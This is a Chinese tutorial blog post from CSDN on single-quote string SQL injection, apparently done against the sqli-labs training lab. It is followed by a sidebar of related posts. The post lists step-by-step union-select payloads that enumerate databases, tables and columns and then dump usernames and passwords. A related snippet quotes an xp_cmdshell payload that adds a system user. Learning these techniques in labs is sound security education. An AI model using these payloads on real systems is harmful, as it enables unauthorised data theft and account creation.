单引号字符型注入

已于 2023-04-18 16:18:44 修改
阅读量10w+ 收藏 6
点赞数 2
文章标签: 数据库
于 2022-12-14 09:44:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lkbzhj/article/details/128311666
版权

1.通过随即输入id

网址后面接?id=1,得到用户名和密码

判断sql注入漏洞的类型:1.数字型、2.字符型。用and 1=1 和and 1=2来判断

2.判断注入漏洞的类型

输入and 1=1来,没有变化

继续输入and 1=2,页面显示正常,说明不是数字型注入漏洞

3.判断注入点

输入?id=1’ and 1=1--+

将1=1换成1=2发现没有报错,但不显示信息,说明可以使用字符注入

4.判断列数

使用order by,从一开始逐渐增加,一直到报错时停止

?id=1’ order by 1--+

由此可以确认列数为3(因为到4报错)

5.判断数据显示位置

?id=0’ union select 1,2,3--+

通过此处便可以插入更多的sql语句去查询一些信息

6.判断数据库的名称

?id=-1’union select 1,2,database()--+

所以数据库的名称为security

7.查询所有库名

?id=-1' nion select 1,group_concat(schema_name),3 from information_schema.schemata --+

所有库显示如上

8.查询所有表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

9.查询security数据库的信息

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

10.查询user表中的列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='user'--+

11.查看user表中的username这一列的值

?id=-1' union select 1,2,group_concat(username) from security.users--+

可以得到账号

12查看user表中的password这一列的值

?id=-1' union select 1,2,group_concat(password) from security.users--+

可以得到上一步骤账户的密码

BTY@BTY
关注
SQL注入--基于错误的GET单引号字符注入
Leslieyzz的博客
02-14 482
SQL注入--基于错误的GET单引号字符注入
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符注入)
luosaierdadi的博客
07-09 247
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
sqli-labs从零开始学习日记(二)
sky_die的专栏
05-08 1837
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件
【SQL注入】Less-1错误GET单引号字符注入
Mitchell_Donovan的博客
03-30 336
Less-1错误GET单引号字符注入 什么是单引号字符注入? 通过'的报错进行sql查询,并用mysql能输出字符的函数,获取我们想要的数据。 漏洞复现过程 在实验室浏览器打开Less-1 1、发现注入点 输入?id=1 正常; 输入?id=1' 报错,就存在sql注入漏洞。 2、猜id=1显示条件表的字段 例如输入?id=1' order by 3 --+ 显示正常 再次输入?id=1' order by 4 --+ 显示错误 所以的出,在?id=1查看的这个表有3个字段
sql宽字节注入,绕过单引号
weixin_34149796的博客
08-04 1726
参加下面: http://leapar.lofter.com/post/122a03_3028a9 http://huaidan.org/archives/2268.html   https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
sqli-labs通关-------11lesson-post(基于错误的POST单引号字符注入)
枯藤闲画云
07-05 436
Post 基于表单提交,类似于下图 Sql的注释:--【空格】单行注释 在url用--+ # 单行注释 /**/ 多行注释 Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码 方法一: 我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。...
单引号字符注入(判断sql注入漏洞的类:1.数字、2.字符 用and 1=1 和and 1=2来判断)
08-26
在本案例,我们讨论的是单引号字符注入,这是针对处理字符串类的SQL查询的注入方法。 首先,我们需要识别注入漏洞的类。通常有两种主要的SQL注入:数字字符。数字注入是当输入字段期望接收数字...
关于Mysql查询带单引号及插入带单引号字符串问题
09-10
在MySQL查询,正确处理带有单引号字符串至关重要,因为单引号是SQL语句的特殊字符,未正确处理可能导致语法错误或者更严重的安全问题,如SQL注入攻击。SQL注入是恶意用户通过输入带有特殊SQL命令的数据来操纵...
GET传输+单引号字符注入+联合查询SQL注入实验我学到了什么
06-03
单引号字符注入,攻击者会在参数值插入单引号,使得SQL语句结构被破坏,从而可以执行恶意操作。在联合查询SQL注入,攻击者会在参数值插入SQL语句,使得该语句与原始查询语句联合执行,从而可以获取更多...
sql注入——单引号注入(sqli-labs-less1)
pluto_23的博客
07-22 4535
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类注入 3.语句是否能够被恶意修改(如添加单引号,双引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
【SQL注入攻击】Single quotes(单引号注入
sm1918451478的博客
10-20 1395
【SQL注入攻击】GET-Error based-Single quotes-String(GET基于错误的单引号字符注入
sql 单引号_我对SQL注入的认知
weixin_39880318的博客
11-26 514
关于SQL注入1.什么是sql注入sql注入是一种将sql代码添加到输入参数,传递到sql服务器解析并执行的一种攻击手段。2.sql注入原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。3.如何寻找注入点首先,we...
mysql注入绕过单引号_SQL注入绕过PHP单引号字符转义原理及预防方法
weixin_39535287的博客
01-19 1426
http://mo47.com/blog/2011/sql_injection_gpc利用GBK双字节编码,绕过单引号转义PHP测试代码如下/* 注入实验:start */$id = $_GET['id'];//建立连接$conn = false;$conn = mysql_connect("localhost","root","");mysql_query("set names 'gbk'");...
php 单引号绕过,利用UTF8字节编码能否绕过PHP单引号转义进行注入
weixin_30914751的博客
03-13 679
利用GBK双字节编码可以绕过单引号转义进行注入,这在之前的文章已经分析过了(《利用GBK双字节编码突破PHP单引号转义限制进行SQL注入》,http://www.redicecn.com/html/wangluoanquan/20101018/180.html)。今天来讨论一下是否能够利用UTF8字节编码绕过转义。先回顾一下GBK编码绕转义的原理:GBK编码的字节范围是:首字节:0x81-0xF...
SQL注入---字符绕过
最新发布
zhoutong2323的博客
04-10 1540
当网页源代码出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入
单引号报错注入---sqli-labs靶场前瞻
yzl_007的博客
08-22 358
单引号报错注入—sqli-labs靶场前瞻 第一关 输入?id=1后正常回显 测试注入点: 构造一下payload:?id=1’or ‘1’='1 正常回显 ?id=1’ and ‘1’ = '2 无回显,由此判断此处存在sql注入漏洞,也可以用sqlmap跑一下如下: 测试指定url是否存在sql注入点 sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 前面测得具有回显,sqlmap也表示存在union联合查询 先查找列 ?id=1
SQL注入绕过
西电卢本伟的博客
03-24 4745
文章目录什么是绕过注释符号绕过双写绕过大小写绕过空格绕过等号绕过内联注释绕过参数污染绕过宽字节注入 什么是绕过 个人理解是系统或者安全软件为了避免攻击者篡改一些参数来获取数据,就会自动过滤一些篡改信息的关键词。但系统和软件终究是人编写出来的,攻击者们还是有各种各样的方法绕过安全点的检测来达到自己的目的。 注释符号绕过 双写绕过 大小写绕过 空格绕过 等号绕过 内联注释绕过 参数污染绕过 宽字节注入 ...
java插入数据库 单引号处理
weixin_30247307的博客
01-02 600
java语句插入数据库的时候,如果string 含有单引号 则可以用下面代码转换为双引号,也可以直接去掉(string.replace("\'","")) // 改变单引号 public static String changeSingleQuotes(String orderString) { String newString = ""; char[] ch = ord...
SQL注入漏洞检测:单引号字符注入方法详解
本篇主要讲解了单引号字符注入的识别和利用步骤: 1. 类判断: - 首先尝试在URL参数添加`?id=1' and 1=1`,如果页面返回结果与正常情况相同,说明可能存在注入点。 - 接着尝试`?id=1' and 1=2`,如果此时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值